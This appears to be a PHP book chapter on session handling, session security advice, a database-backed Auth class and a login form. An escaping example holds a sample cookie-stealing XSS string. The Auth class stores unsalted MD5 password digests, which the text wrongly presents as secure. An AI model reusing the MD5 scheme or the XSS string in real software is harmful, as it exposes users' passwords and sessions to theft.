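```php
<?php
// Hypothetical helper: has a session been idle longer than allowed?
// $lastActivity and $now are Unix timestamps; $maxLifetime is in seconds.
function sessionHasExpired($lastActivity, $now, $maxLifetime)
{
    return ($now - $lastActivity) > $maxLifetime;
}

// Read the configured lifetime; 1440 seconds (24 minutes) is PHP's default
$maxLifetime = (int) ini_get('session.gc_maxlifetime');
if ($maxLifetime <= 0) {
    $maxLifetime = 1440; // fall back if the setting is unavailable
}

$now = time();
$idleForAnHour  = sessionHasExpired($now - 3600, $now, 1440);
$idleForAMinute = sessionHasExpired($now - 60, $now, 1440);
```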

      Solution
      Here’s a very simple demonstration of storing and retrieving a session variable:

                                                                             simpleSession.php

       <?php
       session_start();
       // If session variable doesn't exist, register it
       if (!isset($_SESSION['test']))
       {
         $_SESSION['test'] = 'Hello World!';
         echo '$_SESSION[\'test\'] is registered.<br />' .
             'Please refresh page';
       }
       else
       {
         // It's registered so display it
         echo '$_SESSION[\'test\'] = ' . $_SESSION['test'];
       }
       ?>



      The script registers the session variable test the first time the page is displayed.
      The next time (and all times thereafter, until the session times out through inactivity),
      the script will display the value of the test session variable.

      Discussion
      In general, sessions are easy to use and powerful—they’re an essential tool for
      building online applications. The first order of business in a script that uses sessions
      is to call session_start to load any existing session variables.

      You should always access session variables via the predefined global variable
      $_SESSION, not the functions session_register and session_unregister. Those
      functions fail to work correctly when PHP’s register_globals setting has been
      disabled, which should always be the case, and both they and register_globals
      were removed altogether in PHP 5.4.

      In the following HTTP response headers, a server passes a session cookie to a browser
      as a result of the session_start function in a PHP script:

    HTTP/1.1 200 OK
    Date: Wed, 26 Feb 2003 02:23:08 GMT
    Server: Apache/1.3.27 (Unix) PHP/4.3.1
    X-Powered-By: PHP/4.3.1
    Set-Cookie: PHPSESSID=ce558537fb4aefe349bb8d48c5dcc6d3; path=/
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    ⋮ and so on…



          Storing Sessions Elsewhere
         Notice that I’ve said sessions are stored, by default, on the server as files. It’s also
         possible to store sessions elsewhere, such as in a database or even shared memory.
         We’ll discuss creating a custom session handler for saving the session variables
         to a database in “How do I store sessions in a database?”. Storing sessions in a
         database can be useful for displaying “who’s online” information, and for
         load-balancing multiple web servers using a single session repository, a mechanism
         that allows visitors to (unknowingly) swap servers while their session is
         maintained.



          Sessions Aren’t Perfect
         While sessions are a wonderful tool, they can easily cause headaches if you don’t
         understand their limitations. Take care when you handle data that’s relevant to
         the session state. For example, when users open multiple windows for a site, a
         script executed in one window may overwrite data saved from another, rolling
         back a user to an earlier state in the site. Also be aware that resource handles and
         references are not saved with an object in the session; you need to release and
         recreate them in the __sleep and __wakeup methods of your classes.⁶ Also, try
         to keep the amount of data in the session variables to a minimum, as pulling large
         chunks of data that aren’t used for every page may slow the pages down.




⁶ __sleep and __wakeup are examples of magic methods, and are explained at
http://www.php.net/manual/en/language.oop5.magic.php.

      Session Security
      Sessions are very useful, but there are some important security considerations you
      should take into account when you use sessions in your applications.

      By default, all a browser has to do to gain control of a session is pass a valid session
      ID to PHP. In an ideal world, you could store the IP address that registered the
      session, and double-check it against every new request that used the associated session
      ID. Unfortunately, some ISPs, such as AOL, assign their users a new IP on almost
      every page request, so this type of security mechanism would soon start to throw
      valid users out of the system. As such, it’s important to design your application in
      a manner that assumes that one of your users will eventually have his or her session
      “hijacked.”

      The user’s account is exposed until the session expires, so your aim should be to
      prevent the hijackers from causing serious damage while the session is active. This
      means, for example, that when a logged-in user goes to change his or her account
      password, the old password must be provided (obviously, hijackers won’t know
      that). Also, be careful with the way you handle the users’ personal information (such
      as credit card details). If you give users the opportunity to make significant changes
      to their account details, such as changing a shipping address, be sure to send a
      summary notification of that change to them via email to alert users whose sessions
      may have been hijacked.
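
The old-password rule can be sketched as a single function that refuses to produce a new password digest unless the current password is supplied. The function name changePassword and the sample passwords are assumptions; the sketch stores passwords as MD5 digests only because that is the scheme used by the Auth class later in this chapter.

```php
<?php
// Hypothetical helper: allow a password change only when the old password
// is supplied. $storedDigest is the MD5 digest held for the account.
function changePassword($storedDigest, $oldPassword, $newPassword)
{
    if (md5($oldPassword) !== $storedDigest) {
        return false; // old password missing or wrong: refuse the change
    }
    if ($newPassword === '') {
        return false; // refuse to set an empty password
    }
    return md5($newPassword); // digest to store in place of the old one
}

$stored   = md5('old-secret'); // sample data only
$rejected = changePassword($stored, 'a-guess', 'hijacked');
$accepted = changePassword($stored, 'old-secret', 'new-secret');
```

A hijacker who holds only the session ID gets false back from this function, while the legitimate user receives the digest to store.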

      Keep the session ID completely hidden, using SSL (secure sockets layer) to encrypt
      the conversation. What’s more, you should only use the cookie method of passing
      the session ID. If you pass it in the URL, you might give away the session ID upon
      referring the visitor to another site, thanks to the referer header in the HTTP request.
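
The advice above maps onto a handful of PHP configuration options. The sketch below gathers them in one place; the option names are real PHP settings, but the two function names are assumptions, and the values shown are one reasonable choice rather than the only one.

```php
<?php
// Hypothetical helper: the session options discussed above, in one place.
function recommendedSessionSettings()
{
    return array(
        'session.use_only_cookies' => '1', // ignore session IDs in URLs
        'session.use_trans_sid'    => '0', // never rewrite links with the ID
        'session.cookie_secure'    => '1', // send the cookie over SSL only
    );
}

// Hypothetical helper: apply the settings. This must run before
// session_start() and before any output is sent.
function applySessionSettings($settings)
{
    foreach ($settings as $name => $value) {
        ini_set($name, $value);
    }
}

$settings = recommendedSessionSettings();
```

Calling applySessionSettings($settings) at the very top of a script has the same effect as setting these options in php.ini, which is the better place for them if you have access to it.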

      The files PHP creates for the purpose of storing session information are, by default,
      stored in the temporary directory of the operating system under which PHP is
      running. On Unix-based systems such as Linux, this directory will be /tmp. And, if
      you’re on a shared server, the session files from all the hosted sites will be stored
      together, which means that other users on the server can read the files’ contents.
      They might not be able to identify which virtual host and PHP script are the owners
      of the session but, depending on the information you place there, they might be
      able to guess.

This possibility is a serious cause for concern on shared PHP systems; the most
effective solution is to store your sessions in a database, rather than in the server’s
temporary directory. We’ll look more closely at custom session handlers later in
this chapter, but a partial solution is to set the session.save_path option in your
php.ini to a directory that’s not available to the public. You’ll need to contact your
hosting company in order to have the correct permissions set for that directory, so
that the nobody or wwwuser user with which PHP runs has access to read, write, and
delete files in that directory.

One final warning: with the help of a common web security exploit, cross-site
scripting, or XSS, it’s possible for an attacker to place JavaScript on your site that
will cause visitors to give away their session IDs to a remote web site, thereby
allowing their sessions to be hijacked. If you allow your visitors to post any HTML to
your site, make sure you check and validate it very carefully. Remember the golden
rules: never rely on client-side technologies (such as JavaScript) to handle security,
and never trust any content submitted from a browser.
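
The simplest defence, for sites that don’t need to accept HTML from visitors at all, is to escape every piece of submitted text before displaying it. The sketch below shows the idea using PHP’s htmlspecialchars function; the wrapper name escapeForHtml and the sample comment are assumptions for illustration.

```php
<?php
// Hypothetical helper: make visitor-submitted text safe to echo in HTML.
function escapeForHtml($text)
{
    // ENT_QUOTES converts single quotes as well as double quotes
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// The kind of input an attacker might submit (sample data only)
$comment = '<script>steal(document.cookie)</script>';
$safe = escapeForHtml($comment);
```

After escaping, the browser displays the script as text instead of running it. Sites that do allow some HTML need a more careful filter than this.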


How do I create a session class?
You can make a simple wrapper class to handle your sessions. Doing so ensures
that if you ever want to switch to an alternative session-handling mechanism, such
as one you’ve built yourself, you simply need to modify the class rather than
rewriting a lot of code. We can provide an interface to the $_SESSION variable with a few
simple methods.

Solution
Our custom Session class begins with the constructor method that simply calls
session_start:

                                                              Session.class.php (excerpt)

 class Session
 {
   public function __construct()
   {
     session_start();
   }

      We can then add the set and get methods to set a session variable and get a session
      variable, respectively:

                                                                 Session.class.php (excerpt)

           public function set($name, $value)
           {
             $_SESSION[$name] = $value;
           }

           public function get($name)
           {
             if (isset($_SESSION[$name]))
             {
               return $_SESSION[$name];
             }
             else
             {
               return false;
             }
           }



      Finally, we add a del method to delete a session variable, and the destroy method
      to remove all session variables and reset the session:

                                                                 Session.class.php (excerpt)

           public function del($name)
           {
             unset($_SESSION[$name]);
           }

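           public function destroy()
           {
             $_SESSION = array();
             session_destroy();
             // Start a fresh session and give it a new ID; the ID can only
             // be regenerated while a session is active
             session_start();
             session_regenerate_id(true);
           }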
       }


How do I create a class to control access to a section of the site?
Now we reach the business end of access control—let’s look at a class that controls
who’s permitted access to those private sections of your site. This class uses a
database to hold the access credentials and works with an HTML login form.

Solution
The Auth class wraps login, session storage, and logout functionality in a simple,
easy-to-use PHP class.

The Auth Class
The Auth class uses the following configuration settings:

                                                            access_control.ini (excerpt)

 ; Access Control Settings

 ;web form variables e.g. $_POST['login']
 [login_vars]
 login=login
 password=password
 hash=login_hash

 ;user login table details
 [users_table]
 table=user
 col_login=login
 col_password=password



The first two settings reflect the names of the username and password fields that
will appear on the login form we’ll build in a moment. They’ll match the names of
the $_POST variables submitted by the form: $_POST['password'], for example. The
third setting, hash, names the session variable in which the class stores its login
hash. The next three settings provide details of the table in which user information
is stored: the name of the table, and the names of the username and password columns
in the table.
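
To see how these settings look once PHP has loaded them, the sketch below parses the same text with parse_ini_string. The Auth class itself reads the file with parse_ini_file; the settings are inlined here, and the variable names are assumptions, purely so that the example is self-contained.

```php
<?php
// The settings from access_control.ini, inlined for the example
$ini = <<<INI
[login_vars]
login=login
password=password
hash=login_hash

[users_table]
table=user
col_login=login
col_password=password
INI;

// Passing true as the second argument groups the settings by section
$cfg = parse_ini_string($ini, true);

$loginField = $cfg['login_vars']['login'];
$usersTable = $cfg['users_table']['table'];
```

Each section becomes a nested array, so a setting is addressed by section name and then by setting name.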

      The database table user will be used in all the solutions in this section. Here’s the
      SQL for the table:

                                                                  access_control.sql (excerpt)

       CREATE TABLE user (
         user_id     INT(11)      NOT NULL AUTO_INCREMENT,
         login       VARCHAR(50) NOT NULL DEFAULT '',
         password    VARCHAR(50) NOT NULL DEFAULT '',
         email       VARCHAR(50) DEFAULT NULL,
         firstName   VARCHAR(50) DEFAULT NULL,
         lastName    VARCHAR(50) DEFAULT NULL,
         signature   TEXT         NOT NULL,
         PRIMARY KEY (user_id),
         UNIQUE KEY user_login (login)
       );



      The Auth class body begins with the class properties:

                                                                     Auth.class.php (excerpt)

       class Auth
       {
         protected   $db;
         protected   $cfg;
         protected   $session;
         protected   $redirect;
         protected   $hashKey;



      The $db property will store an instance of our DB connection class, while the $cfg
      property will store the configuration settings. The $session property will store an
      instance of the Session class we created in “How do I create a session class?”. The
      $redirect property will store a URL to which visitors will be redirected if they
      aren’t logged in, or if their usernames or passwords are incorrect; this might be a
      login form, for example. The $hashKey property is a seed we provide to
      double-check the usernames and passwords of users who are already logged in. I’ll explain
      this in more detail later.

      Now we can create the constructor method of our Auth class:

                                                               Auth.class.php (excerpt)

   function __construct(PDO $db, $redirect, $hashKey)
   {
     $this->db       = $db;
     $this->cfg      = parse_ini_file('access_control.ini', TRUE);
     $this->redirect = $redirect;
     $this->hashKey = $hashKey;
     $this->session = new Session();
     $this->login();
   }



The constructor requires a $db parameter that accepts an instance of the PDO class
(although you can alter it to a custom class; just be sure to adjust the database
interaction areas as required for your class). The $redirect parameter is a URL string
and the $hashKey parameter is a string.

In the constructor, we set the Auth instance variables, load the configuration file,
and create a new instance of the Session class, which we store in the $session
property; finally, we call the login method to validate the user against the database.

The login method checks the user’s login credentials:

                                                               Auth.class.php (excerpt)

   private function login()
   {
     $var_login = $this->cfg['login_vars']['login'];
     $var_pass = $this->cfg['login_vars']['password'];
     $user_table = $this->cfg['users_table']['table'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_pass = $this->cfg['users_table']['col_password'];

      // Use the configured session variable name rather than a literal
      if ($this->session->get($this->cfg['login_vars']['hash']))
      {
        $this->confirmAuth();
        return;
      }
      if (!isset($_POST[$var_login]) ||
          !isset($_POST[$var_pass]))
      {
        $this->redirect();
      }

      The configuration settings are assigned to local variables for the sake of readability.
      The login method first checks to see whether a login hash is currently stored in the
      session, which indicates that the user has already logged in; if it is, the method
      calls the confirmAuth method and returns. Otherwise, the method checks to see whether
      username and password values are available in the $_POST array; if they’re not, the
      method calls the redirect method.

      Assuming the script has found the $_POST values, it calls the md5 function to get a
      digest for the password:

                                                                             Auth.class.php (excerpt)

         $password = md5($_POST[$var_pass]);



      For security reasons, we keep only the MD5 digest of the password, both in the
      session and in the database: we don’t want to leave plain-text passwords lying
      around.


             The MD5 Algorithm
            MD5 is a simple message digest algorithm (often referred to as one-way encryption)
            that translates any string (such as a password) into a short series of ASCII characters
            called an MD5 digest. A particular string will always produce the same digest,
            but it’s practically impossible to guess a string that will produce a given digest.
            By storing only the MD5 digest of your users’ passwords in the database, you can
            verify their login credentials without actually storing the passwords on your
            server! The built-in PHP function md5 lets you calculate the MD5 digest of any
            string in PHP.
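
The properties described in the note above can be checked with a few lines of code. This is a small sketch; the function name passwordMatches and the sample passwords are assumptions made for the example.

```php
<?php
// md5() always returns a 32-character hexadecimal digest
$digest = md5('secret');

// The same input always yields the same digest...
$sameAgain = (md5('secret') === $digest);

// ...while even a small change to the input yields a different one
$differs = (md5('Secret') !== $digest);

// Hypothetical helper: verifying a login compares digests, never
// plain-text passwords
function passwordMatches($submitted, $storedDigest)
{
    return md5($submitted) === $storedDigest;
}
```

If you are running PHP 5.5 or later, the built-in password_hash and password_verify functions follow the same store-a-digest pattern while adding a per-password salt, and may be worth considering in place of md5.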


      The script then performs a query against the database to see if it can find a record
      to match the submitted username and password:

                                                                             Auth.class.php (excerpt)

     try
     {
       $sql = "SELECT COUNT(*) AS num_users " .
           "FROM " . $user_table . " WHERE " .
           $user_login . "=:login AND " .
           $user_pass . "=:pass";
       $stmt = $this->db->prepare($sql);
       $stmt->bindParam(':login', $_POST[$var_login]);
       $stmt->bindParam(':pass', $password);
       $stmt->execute();
       $row = $stmt->fetch(PDO::FETCH_ASSOC);
     }
     catch (PDOException $e)
     {
       error_log('Error in '.$e->getFile().
           ' Line: '.$e->getLine().
           ' Error: '.$e->getMessage()
       );
       $this->redirect();
     }
     if ($row['num_users'] != 1)
     {
       $this->redirect();
     }
     else
     {
       $this->storeAuth($_POST[$var_login], $password);
     }
   }




We use the PDO methods prepare and execute to perform the database query,
binding our $_POST[$var_login] and $password variables to the SQL parameters
:login and :pass respectively. We can’t authenticate the user reliably if a
PDOException is thrown, so in that case, we log the error and call the redirect
method.

After we fetch the result of the query, we test that there is exactly one matching
record. If not, we call the redirect method. Finally, assuming it has reached this
point, the script registers the username and password as session variables by way
of the storeAuth method (explained below), which makes them available for future
page requests.


             login and Magic Quotes
           One point to note about the login method is that it assumes magic_quotes_gpc
           is switched off. In the scripts that utilize this class, we’ll need to nullify the effect
           of magic quotes. You can read more about this task in the section called “Checking
           for Magic Quotes” in Chapter 1.


      The storeAuth method is used to add the username and password digest to the
      session, along with a special hash value:

                                                                              Auth.class.php (excerpt)

         public function storeAuth($login, $password)
         {
           $this->session->set($this->cfg['login_vars']['login'], $login);
           $this->session->set($this->cfg['login_vars']['password'],
               $password);
           $hashKey = md5($this->hashKey . $login . $password);
           $this->session->set($this->cfg['login_vars']['hash'], $hashKey);
         }



      This special hash value is composed of a seed value (the $hashKey parameter
      required by the constructor) as well as the username and password values. As we’ll
      see in the confirmAuth method below, instead of laboriously checking the database
      to verify the login credentials whenever a user requests a page, the class simply
      checks that the current username and password produce a hash value that’s the
      same as that stored in the session. This approach prevents potential attackers from
      attempting to change the stored username after login if your PHP configuration has
      register_globals enabled.
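
The effect of the hash is easiest to see outside the class. The sketch below reproduces the same calculation with two stand-alone functions and a plain array in place of the session; the function names, the seed value, and the sample user are all assumptions made for illustration.

```php
<?php
// Hypothetical stand-alone versions of the hash logic in the Auth class;
// $seed plays the role of the $hashKey constructor argument.
function makeLoginHash($seed, $login, $passwordDigest)
{
    return md5($seed . $login . $passwordDigest);
}

function loginHashIsValid($seed, $login, $passwordDigest, $storedHash)
{
    // Strict comparison avoids PHP's loose string-to-number conversions
    return makeLoginHash($seed, $login, $passwordDigest) === $storedHash;
}

// At login time: compute the hash and keep it alongside the credentials
$session = array(
    'login'    => 'bob',
    'password' => md5('secret'),
);
$session['login_hash'] =
    makeLoginHash('seed-value', $session['login'], $session['password']);

// On a later request: an untampered session still validates
$ok = loginHashIsValid('seed-value', $session['login'],
    $session['password'], $session['login_hash']);

// If the stored username is altered, the hash no longer matches
$session['login'] = 'admin';
$tampered = loginHashIsValid('seed-value', $session['login'],
    $session['password'], $session['login_hash']);
```

Because the seed never leaves the server, someone who manages to alter the stored username can’t compute a matching hash to go with it.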

      The confirmAuth method is used to double-check credentials stored in the session
      once a user is logged in:

                                                                              Auth.class.php (excerpt)

   private function confirmAuth()
   {
     $login = $this->session->get(
         $this->cfg['login_vars']['login']);
     $password = $this->session->get(
         $this->cfg['login_vars']['password']);
     $hashKey = $this->session->get(
         $this->cfg['login_vars']['hash']);
     // Compare strictly, so that digests are never compared as numbers
     if (md5($this->hashKey . $login . $password) !== $hashKey)
     {
       $this->logout(true);
     }
   }




Notice how we reproduce the hash built by the storeAuth method—if this fails to
match the original hash value, the user is immediately logged out.

The logout method is used to remove the login credentials from the session, destroy
the session, and return the user to the page URL stored in the $redirect property:

                                                              Auth.class.php (excerpt)

   public function logout($from = false)
   {
     $this->session->del($this->cfg['login_vars']['login']);
     $this->session->del($this->cfg['login_vars']['password']);
     $this->session->del($this->cfg['login_vars']['hash']);
     $this->session->destroy();
     $this->redirect($from);
   }



For security reasons, I choose to destroy the session here and start a completely
new one. However, you may want to consider whether or not you wish to destroy
the session. When the session is destroyed, not only are the Auth credentials
removed, but all session data is as well, and a new session ID is created. If you have
session data that you don’t want to lose upon logout, you may wish to remove or
comment out the session->destroy method call.

The final piece of our Auth class is the redirect method:

                                                              Auth.class.php (excerpt)

   private function redirect($from = true)
   {
     if ($from)
     {
       // Encode the original URI so its own query string survives intact
       header('Location: ' . $this->redirect . '?from=' .
           urlencode($_SERVER['REQUEST_URI']));
     }
     else
     {
       header('Location: ' . $this->redirect);
     }
     exit();
   }
 }




      The redirect method is used to return the visitor to the login form (or whichever
      URL we specified upon instantiating the Auth class). By default, this method sends
      the URL of the originally requested page, in the from query string variable, to
      the URL to which the browser is redirected (most likely the login form). This allows
      the login form to read the query string and return users to the location from
      which they came, which saves them from having to navigate back to that point; this
      feature might be useful if, for example, a session times out. Note that I specified in
      the logout method that redirect should not provide the from variable. If it did,
      the script might return users to the URL they used to log out, trapping them in a
      loop from which they can’t log in.
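
Both halves of this round trip can be sketched as small functions: one builds the redirect URL, and one lets the login form decide whether the from value is safe to use as a return target. The function names and the example.com address are assumptions, and the restriction to local paths is an extra precaution added for this sketch rather than something the Auth class does.

```php
<?php
// Hypothetical helper: build the URL of the login form, carrying the
// originally requested URI in the "from" query variable.
function buildLoginUrl($loginUrl, $requestUri)
{
    return $loginUrl . '?from=' . urlencode($requestUri);
}

// Hypothetical helper for the login form: accept only local paths as a
// return target, so the form can't be used to bounce visitors off-site.
function safeReturnPath($from, $default)
{
    // Must start with a single "/" (browsers treat "//" as another host)
    // and must not contain a backslash
    if (is_string($from) && $from !== '' && $from[0] === '/'
        && substr($from, 0, 2) !== '//'
        && strpos($from, '\\') === false) {
        return $from;
    }
    return $default;
}

$url = buildLoginUrl('http://www.example.com/login.php',
    '/members/index.php?page=2');
```

PHP decodes the from value automatically when the login form reads it from $_GET, so the form would simply pass $_GET['from'] to safeReturnPath after a successful login.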

      One important point to note here is that the redirection URL argument passed to
      the constructor function should be absolute, not relative. According to the HTTP/1.1
      specification (RFC 2616), an absolute URL must be provided when a Location header is used.
      Later on, when we put this class into action, I’ll break that rule and use a relative
      URL, because I can’t guess the script’s location on your server. This trick works
      because most recent browsers understand the relative location anyway (even though
      they shouldn’t, as this doesn’t honour the specification). On a live site, though,
      make sure you provide a full, absolute URL.

      Finally, and most importantly, we use the exit function to terminate all further
      processing. Calling the exit function prevents the calling script from sending the
      protected content that follows the authentication code. Although we’ve sent a
      header that should redirect the browser, we can’t rely on the browser to do what
      it’s told. If the request were sent by, for instance, a Perl script pretending to be a
      web browser, whoever was using the script would, no doubt, have total control over
      its behavior and could quite easily ignore the instruction to redirect elsewhere.
      Hence, the exit statement is crucial.

The Restricted Area
Now that you’ve seen the internals of the Auth class, let’s take a look at some code
that makes use of it.

Here’s an example of a page we want to protect. First, we list the files we require:

                                                                   access.php (excerpt)

 <?php
 require_once    'strip_quotes.php';
 require_once    'Session.class.php';
 require_once    'Auth.class.php';
 require_once    'dbcred.php';



strip_quotes.php is a general-purpose script that checks whether magic_quotes_gpc is
On and, if necessary, strips the added slashes from incoming request data.
Session.class.php is the Session class required by our Auth class and Auth.class.php
is the Auth class itself. dbcred.php contains our database login credentials for use
with PDO. The file contains credentials relevant to our testing environment, so you’ll
need to change them should you wish to try this on your own web server.

Next, we instantiate the PDO object and authenticate the user. This code needs to
go at the top of any page we wish to protect from unauthorized access:

                                                                   access.php (excerpt)

 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
 }
 catch (PDOException $e)
 {
   error_log('Error in '.$e->getFile().
       ' Line: '.$e->getLine().
       ' Error: '.$e->getMessage()
   );
   // URL-encode the query string values so the header stays valid
   header('Location: error.php?err=' . urlencode('Database Error') .
       '&msg=' . urlencode($e->getMessage()));
   exit();
 }

 $auth = new Auth($dbh, 'login.php', 'secret');

 if (isset($_GET['action']) && $_GET['action'] == 'logout')
 {
   $auth->logout();
 }
 ?>




      First, we attempt to create a PDO instance to connect to our database. If an exception
      is thrown and we can’t connect, we don’t want to reveal our protected content. Instead,
      we simply log the error, and redirect the user to an error page that displays
      some helpful information. Once we have a PDO instance, we can create a new Auth
      instance to check the current user’s login credentials. We pass our PDO instance, the
      URL of our login form (login.php), and the seed for the login details hashing
      functionality to the constructor function. Following that, we use an if statement to
      check for a logout request. If a $_GET['action'] variable is present and it equals the
      value logout, we know the logout link has been clicked and we should log the user
      out by way of the Auth->logout method. All we have to do to make a logout link
      is append ?action=logout to any URL on our site.

      Finally, here’s the HTML of our restricted page, complete with a logout link:

                                                                        access.php (excerpt)

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
         ⋮ HTML head contents…
         </head>
         <body>
           ⋮ restricted content…
           <p><a href="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>?action=logout">
               Logout</a></p>
         </body>
       </html>

The only way the user can view this page is to provide a correct username and
password. The Auth class performs the security check as soon as it’s instantiated.
If valid username and password values have been submitted via a form, they’re
stored by the Auth class in a session variable, which allows the visitor to continue
using the site’s various sections without having to log in again.

Creating the login form itself isn’t complex, but it’s made even easier with the
PEAR::HTML_QuickForm package. HTML_QuickForm allows us to add fields to our
form and define the validation requirements easily. I won’t launch into an explanation
of how this works, but if you’d like to learn more about HTML_QuickForm, you
can read the documentation online.7


          PEAR PHP 5 E_STRICT Compliance
         It should be noted that most PEAR packages are not PHP 5 E_STRICT compliant.
         You can expect errors to be generated, but don’t forget that you can turn them off
         with the error_reporting function. Submit a bug report to the PEAR bug system
         for any errors you do come across to help stomp them out in future versions.8


Let’s begin the login form: we’ll start by setting the error reporting level and requiring
the PEAR::HTML_QuickForm package:

                                                                           login.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require_once 'HTML/QuickForm.php';



We set the error reporting level to E_ALL with the error_reporting function because
we’re using PEAR packages, which will cause E_STRICT errors under PHP 5. In PHP 5
versions before 5.4, E_ALL doesn’t include E_STRICT, so those errors stay hidden.

Next we check for the presence of a $_GET['from'] variable:




7 http://pear.php.net/manual/en/package.html.html-quickform.php
8 http://pear.php.net/bugs/

                                                                       login.php (excerpt)

       if (isset($_GET['from']))
       {
         $target = $_GET['from'];
       }
       else
       {
         $target = 'access.php';
       }
       ?>



      The $_GET['from'] variable will have been set by our Auth class if it’s required.
      This variable will represent the page to which the user was trying to gain access,
      and from which they’ve been redirected to this login form. It’s used as the form’s
      action attribute to send the user back to that page once he or she is logged in.
      Otherwise, for the purposes of this demonstration, the form defaults to access.php,
      our demonstration page with restricted content.
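Because the from value arrives in the query string, a visitor can set it to anything. Here's a minimal sketch of one way to accept only local targets before using the value as the form's action. The loginTarget function is hypothetical, and the exact format in which the Auth class passes the from value is an assumption here; the code assumes PHP 7 or later:

```php
<?php
// Hypothetical helper: returns the requested target only if it looks
// like a local path, and a default page otherwise.
function loginTarget(array $query, string $default = 'access.php'): string
{
    $from = $query['from'] ?? null;

    if (!is_string($from) || $from === '') {
        return $default;
    }

    // Reject absolute URLs, protocol-relative URLs, and backslashes
    if (strpos($from, '://') !== false
        || strpos($from, '//') === 0
        || strpos($from, '\\') !== false) {
        return $default;
    }

    // Allow only characters expected in a local path and query string
    if (preg_match('#^[A-Za-z0-9_./?=&%\-]+$#', $from) !== 1) {
        return $default;
    }

    return $from;
}

$target = loginTarget($_GET);
```

The character whitelist is deliberately strict; loosen it only if your own URLs need other characters.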

      The next step is to construct our form with the PEAR::HTML_QuickForm class:

                                                                       login.php (excerpt)

       $form = new HTML_QuickForm('loginForm', 'POST', $target);

       // Add a header to the form
       $form->addElement('header', 'MyHeader', 'Please Login');

       // Add a field for the login name
       $form->addElement('text', 'login', 'Username');
       $form->addRule('login', 'Enter your login', 'required', false,
           'client');

       // Add a field for the password
       $form->addElement('password', 'password', 'Password');
       $form->addRule('password', 'Enter your password', 'required',
           false, 'client');

       // Add a submit button
       $form->addElement('submit', 'submit', ' Login ');

       ?>

Finally, we have the HTML for the login form page:

                                                                    login.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <h1>Please log in</h1>
     <?php echo $form->toHTML(); ?>
   </body>
 </html>



The finished login form can be seen in Figure 10.2.




                             Figure 10.2. The finished login form


Discussion
Access control consists of two main parts, or stages:

Authentication
   Authentication is the process by which you determine that users are who they
   say they are. Our Auth class handles this determination for us in the login
   method, when we confirm the username and password against the database.
          We make the assumption that only the correct user will have these two pieces
          of information.

      Authorization
         Authorization is the process by which you determine which permissions must
         be given to an authenticated user. The Auth class is very limited in this respect,
         as no levels of access are defined—there’s only global access or no access to the
         site. Of course, you may want to grant a level of access that lies somewhere
         between these extremes, in which case you should see “How do I build a
         permissions system?”

      You may wonder why we handle the users in this class using a database, rather
      than something similar to the HTTP authentication explained earlier. There are a
      couple of reasons, actually. First, as a site grows from only a few members to hundreds,
      thousands, or millions (we hope) of members, HTTP authentication becomes
      harder to handle and slower. Yes, we can add the member details to the user file,
      but as this, in turn, grows larger, it takes longer for the server to read and find a
      given user. Second, what if we want to store more information about the user—as,
      of course, most of us do—than just the username and password? Where would we
      keep that information? Well, we’d keep it in the database, of course. Doesn’t that
      mean we’re storing user information in two places? Yes, that’s right and, as you
      know, that’s something we’d want to avoid; it just makes the job harder for us if we
      ever have to go back and change things later.

      Room for Improvement
      The basic mechanics of the Auth class are solid, but it lacks the more sophisticated
      elements that will be necessary to halt the efforts of any serious intruders.

      It’s a good idea to implement a mechanism that can keep an eye on the number of
      failed login attempts made from a single client. If your application always responds
      immediately to any login attempt, it will be possible for a potential intruder to make
      large numbers of requests—with different username and password combinations—in
      a very short time, possibly using automated software to do so. The solution is to
      build a mechanism that counts the number of failed attempts using a session variable.
      Every time the number of failures is divisible by three (such as when three incorrect
      passwords are entered), use PHP’s sleep function to delay the next attempt by, for
      example, ten seconds. You may also decide that, after a certain threshold value (15
      failed attempts, for example), you block all further access from that IP address for
a given period, such as one hour. Of course, changing an IP address is easy for a
determined intruder, but you’ll stall would-be intruders, at least, and perhaps make
their lives difficult enough to persuade them to pursue their nefarious activities
elsewhere.
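Here's a minimal sketch of the counting logic just described, using the figures from the text (a ten-second pause on every third failure, and a block after 15). The function names and the failed_logins session key are hypothetical, and the IP-based block itself would need server-side storage that isn't shown here. The code assumes PHP 7 or later:

```php
<?php
// Hypothetical thresholds taken from the figures in the text.
const DELAY_EVERY   = 3;   // pause on every third failure
const DELAY_SECONDS = 10;  // length of the pause
const BLOCK_AFTER   = 15;  // failures before blocking outright

// Returns 'block', 'delay', or 'ok' for a given failure count.
function throttleAction(int $failures): string
{
    if ($failures >= BLOCK_AFTER) {
        return 'block';
    }
    if ($failures > 0 && $failures % DELAY_EVERY === 0) {
        return 'delay';
    }
    return 'ok';
}

// Records one failed login in the session data and applies the policy.
function registerFailedLogin(array &$session): string
{
    $session['failed_logins'] = ($session['failed_logins'] ?? 0) + 1;
    $action = throttleAction($session['failed_logins']);

    if ($action === 'delay') {
        sleep(DELAY_SECONDS);
    }
    return $action;
}
```

After a failed login you would call registerFailedLogin($_SESSION) and refuse to show the form again if it returns 'block'. Keep in mind that a client can discard its session cookie, so a session counter only slows down casual attempts.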


How do I build a registration system?
Having an authentication system is fine, but how will you fill it with users in the
first place? If only you and a few friends will access your site, you can probably
create accounts for all users through your database administration interface. However,
for a site that’s intended to become a flourishing community to which anyone and
everyone is free to sign up, you’ll likely need to automate this process. You’ll want
to allow visitors to register themselves, but you’ll probably conduct some level of
“screening” so that you have at least a little information about the people who have
signed up, such as a way to confirm their identities. A common and effective
screening approach is to have the registrants confirm their email address.

The purpose of the screening mechanism is to give you the ability to make it difficult
for those users who have “broken the rules” in some way and lost their account
privileges to create new accounts. You have their email addresses, or at least one
